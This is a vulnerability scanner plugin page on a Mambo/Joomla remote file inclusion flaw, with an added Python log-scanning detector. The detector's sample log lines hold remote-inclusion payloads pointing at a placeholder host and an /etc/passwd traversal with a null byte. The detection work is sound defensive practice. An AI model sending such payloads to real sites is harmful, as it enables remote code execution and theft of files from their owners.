Mambo / Joomla Component / Module mosConfig_absolute_path Parameter Remote File Inclusion

Medium Nessus Network Monitor Plugin ID 3687


The remote web server contains a PHP application that is prone to remote file inclusion attacks.


The remote host contains a third-party Mambo / Joomla component or module. The version of at least one such component or module installed on the remote host fails to sanitize input to the 'mosConfig_absolute_path' parameter before using it to include PHP code. Provided PHP's 'register_globals' setting is enabled, an unauthenticated attacker may be able to exploit these flaws to view arbitrary files on the remote host or to execute arbitrary PHP code, possibly taken from third-party hosts.


Disable PHP's 'register_globals' setting. Upgrade or patch according to vendor recommendations.
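The condition described above can also be hunted for in web server logs, since a normal client has no reason to supply 'mosConfig_absolute_path' in a request. The Python below is an added example, not part of this plugin or of Tenable's detection logic; the log lines, addresses, hosts and component paths in it are constructed, and the combined access log format is an assumption.

```python
import re
from urllib.parse import parse_qsl

PARAM = "mosConfig_absolute_path"  # parameter named in the plugin description
# Client IP, request target and status from a combined-format access log line.
REQ_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')
# Two or more scheme characters before ':' (http:, ftp:, data:), so a Windows
# drive letter such as C: is not mistaken for a URL.
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]+:', re.I)

def classify(value):
    """'remote-url' if the value names a URL or stream wrapper, else 'local-path'."""
    return "remote-url" if SCHEME_RE.match(value.strip()) else "local-path"

def scan(lines):
    """Return (ip, path, kind, status) for every request that sets PARAM."""
    findings = []
    for line in lines:
        m = REQ_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        path, _, query = target.partition("?")
        # parse_qsl percent-decodes names and values, so encoded forms match too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name == PARAM:
                findings.append((ip, path, classify(value), int(status)))
    return findings

# Constructed sample log lines (documentation addresses, placeholder paths).
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Jul/2006:10:00:01 +0000] "GET /index.php?option=com_content&id=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [24/Jul/2006:10:00:02 +0000] "GET /components/com_example/example.php'
    '?mosConfig_absolute_path=http%3A%2F%2Ffiles.example.test%2Fx.txt%3F HTTP/1.1" 200 312',
    '203.0.113.9 - - [24/Jul/2006:10:00:03 +0000] "GET /modules/mod_example.php'
    '?mosConfig_absolute_path=../../../../etc/passwd%00 HTTP/1.0" 404 210',
    '198.51.100.4 - - [24/Jul/2006:10:00:04 +0000] "GET /components/com_example/example.php'
    '?mosConfig%5Fabsolute_path=ftp://files.example.test/a HTTP/1.1" 200 98',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit with status 200 shows only that the script was reachable, not that the inclusion succeeded; confirm against the 'register_globals' setting and the installed component version.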

Plugin Details

Severity: Medium

ID: 3687

File Name: 3687.prm

Family: CGI

Published: 2006/07/24

Modified: 2016/01/21

Dependencies: 1442

Nessus ID: 22049

Risk Information

Risk Factor: Medium


CVSS v2

Base Score: 5.8

Temporal Score: 5.2

Vector: CVSS2#AV:A/AC:L/Au:N/C:P/I:P/A:P

Temporal Vector: CVSS2#E:F/RL:W/RC:ND


CVSS v3

Base Score: 6.3

Temporal Score: 6


Temporal Vector: CVSS3#E:F/RL:W/RC:X

Reference Information

CVE: CVE-2006-3846, CVE-2006-5048, CVE-2007-1702, CVE-2007-3130, CVE-2007-2144, CVE-2007-2319, CVE-2006-3396, CVE-2006-3530, CVE-2006-3556, CVE-2007-2005, CVE-2006-3774, CVE-2006-5045, CVE-2006-3748, CVE-2006-3749, CVE-2006-3750, CVE-2006-3751, CVE-2006-3773, CVE-2006-3947, CVE-2006-3949, CVE-2006-3980, CVE-2006-3995, CVE-2006-4074, CVE-2006-4130, CVE-2006-4195, CVE-2006-4270, CVE-2006-4288, CVE-2006-4553, CVE-2006-4858, CVE-2006-5519, CVE-2006-6962

BID: 24342, 24592, 23529, 23490, 23408, 23113, 23125, 19217, 19222, 19223, 19224, 19233, 19373, 19465, 19505, 19574, 19581, 19725, 20018, 20667, 18705, 18808, 18876, 18919, 18924, 18968, 18991, 19037, 19042, 19044, 19047, 19100